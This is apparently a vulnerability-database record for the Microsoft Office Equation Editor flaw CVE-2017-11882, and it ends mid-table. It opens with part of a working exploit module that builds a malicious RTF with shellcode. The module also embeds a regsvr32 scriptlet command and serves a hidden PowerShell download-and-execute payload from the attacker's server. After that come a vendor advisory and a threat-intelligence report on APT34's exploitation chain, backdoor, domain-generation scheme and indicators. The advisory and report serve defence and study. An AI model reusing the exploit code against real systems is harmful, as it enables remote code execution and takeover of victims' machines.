File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}], "symantec": [{"lastseen": "2018-03-14T17:01:30", "bulletinFamily": "software", "cvelist": ["CVE-2017-11882"], "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101757", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101757", "type": "symantec", "title": "Microsoft Office CVE-2017-11882 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "description": "Less than a week after Microsoft issued a patch for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.\n\nWe believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.\n\nAPT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a [spear phishing campaign](<https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html>) targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>).\n\nIn this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.\n\nThe full report on APT34 is available to our [MySIGHT customer community](<https://www.fireeye.com/products/isight-cyber-threat-intelligence-subscriptions.html>). APT34 loosely aligns with [public reporting related to the group \"OilRig\"](<https://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/>). As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.\n\n#### CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability\n\nCVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.\n\nThe vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It is created as a separate process instead of child process of Office applications. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. As the EQNEDT32.exe is compiled using an older compiler and does not support address space layout randomization (ASLR), a technique that guards against the exploitation of memory corruption vulnerabilities, the attacker can easily alter the flow of program execution.\n\n#### Analysis\n\nAPT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882, which corrupts the memory on the stack and then proceeds to push the malicious data to the stack. The malware then overwrites the function address with the address of an existing instruction from EQNEDT32.EXE. The overwritten instruction (displayed in Figure 1) is used to call the \u201cWinExec\u201d function from kernel32.dll, as depicted in the instruction at 00430c12, which calls the \u201cWinExec\u201d function.\n\n \nFigure 1: Disassembly of overwritten function address\n\nAfter exploitation, the \u2018WinExec\u2019 function is successfully called to create a child process, \u201cmshta.exe\u201d, in the context of current logged on user. The process \u201cmshta.exe\u201d downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.\n\n \nFigure 2: Attacker data copied to corrupt stack buffer\n\n#### Execution Workflow\n\nThe malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.\n\n \nFigure 3: CVE-2017-11882 and POWRUNER attack sequence\n\n 1. The malicious .rtf file exploits CVE-2017-11882.\n 2. The malware overwrites the function address with an existing instruction from EQNEDT32.EXE.\n 3. The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt.\n 4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.\n 5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\\n 6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.\n 7. cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.\n 8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.\n 9. cUpdateCheckers.bat and *.base are deleted from the staging directory.\n\nFigure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.\n\n \nFigure 4: Execution Workflow Section of v.vbs\n\nAfter successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. \n\n#### hUpdateCheckers.ps1 (POWRUNER)\n\nThe backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.\n\n \nFigure 5: POWRUNER PowerShell script hUpdateCheckers.ps1\n\nPOWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either \u201cnot_now\u201d or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. The command values and the associated actions are described in Table 1.\n\nCommand\n\n| \n\nDescription\n\n| \n\nAction \n \n---|---|--- \n \n0\n\n| \n\nServer response string contains batch commands\n\n| \n\nExecute batch commands and send results back to server \n \n1\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and upload (PUT) the file to server \n \n2\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and download (GET) the file \n \nTable 1: POWRUNER commands\n\nAfter successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.\n\nThe C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system. POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued. Figure 6 shows the PowerShell \u201cGet-Screenshot\u201d function sent by the C2 server.\n\n \nFigure 6: Powershell Screenshot Functionality\n\n#### dUpdateCheckers.ps1 (BONDUPDATER)\n\nOne of the recent advancements by APT34 is the use of DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA algorithm to generate subdomains for communication with the C2 server.\n\n#### DGA Implementation\n\nFigure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER\u2019s custom DGA.\n\n \nFigure 7: Breakdown of subdomain created by BONDUPDATER\n\n 1. This is a randomly generated number created using the following expression: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));\n 2. This value is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.\n 3. Initially set to 000, then incremented by 3 after every DNS request\n 4. First 12 characters of system UUID.\n 5. \u201cB007\u201d hardcoded string.\n 6. Hardcoded domain \u201cmumbai-m[.]site\u201d\n\nBONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:\n\n 1. Create a temporary file in %temp% location\n * The file created will have the last two octets of the resolved IP addresses as its filename.\n 2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.\n\nCharacter\n\n| \n\nDescription \n \n---|--- \n \n0\n\n| \n\nFile contains batch commands, it executes the batch commands \n \n1\n\n| \n\nRename the temporary file as .ps1 extension \n \n2\n\n| \n\nRename the temporary file as .vbs extension \n \nTable 2: BONDUPDATER Actions\n\nFigure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation.\n\n \nFigure 8: Domain Generation Algorithm\n\nSome examples of the generated subdomains observed at time of execution include:\n\n143610035BAF04425847B007.mumbai-m[.]site\n\n835710065BAF04425847B007.mumbai-m[.]site\n\n376110095BAF04425847B007.mumbai-m[.]site\n\n#### Network Communication\n\nFigure 9 shows example network communications between a POWRUNER backdoor client and server.\n\n \nFigure 9: Example Network Communication\n\nIn the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response.\n\nIf the server had sent the string \u201cnot_now\u201d as response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.\n\n \nFigure 10: Example \"not now\" server response\n\n#### Batch Commands\n\nPOWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.\n\n \nFigure 11: Batch commands sent by POWRUNER C2 server\n\n#### Additional Use of POWRUNER / BONDUPDATER\n\nAPT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8)** **that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from:\n\nhxxp://94.23.172.164/dupdatechecker.doc.\n\nAs shown in Figure 12, the script within the dupatechecker.doc file attempts to download another file named dupatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be an apparent taunt to security researchers.\n\n \nFigure 12: Contents of dupdatechecker.doc script\n\nThe dupatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.\n\n#### Outlook and Implications\n\nRecent activity by APT34 demonstrates that they are capable group with potential access to their own development resources. During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882)** **to target organizations in the Middle East. We assess that APT34\u2019s efforts to continuously update their malware, including the incorporation of DGA for C2, demonstrate the group\u2019s commitment to pursing strategies to deter detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.\n\n#### IOCs\n\n**Filename / Domain / IP Address**\n\n| \n\n**MD5 Hash or Description** \n \n---|--- \n \nCVE-2017-11882 exploit document\n\n| \n\nA0E6933F4E0497269620F44A083B2ED4 \n \nb.txt\n\n| \n\n9267D057C065EA7448ACA1511C6F29C7 \n \nv.txt/v.vbs\n\n| \n\nB2D13A336A3EB7BD27612BE7D4E334DF \n \ndUpdateCheckers.base\n\n| \n\n4A7290A279E6F2329EDD0615178A11FF \n \nhUpdateCheckers.base\n\n| \n\n841CE6475F271F86D0B5188E4F8BC6DB \n \ncUpdateCheckers.bat\n\n| \n\n52CA9A7424B3CC34099AD218623A0979 \n \ndUpdateCheckers.ps1\n\n| \n\nBBDE33F5709CB1452AB941C08ACC775E \n \nhUpdateCheckers.ps1\n\n| \n\n247B2A9FCBA6E9EC29ED818948939702 \n \nGoogleUpdateschecker.vbs\n\n| \n\nC87B0B711F60132235D7440ADD0360B0 \n \nhxxp://mumbai-m[.]site\n\n| \n\nPOWRUNER C2 \n \nhxxp://dns-update[.]club\n\n| \n\nMalware Staging Server \n \nCVE-2017-0199 exploit document\n\n| 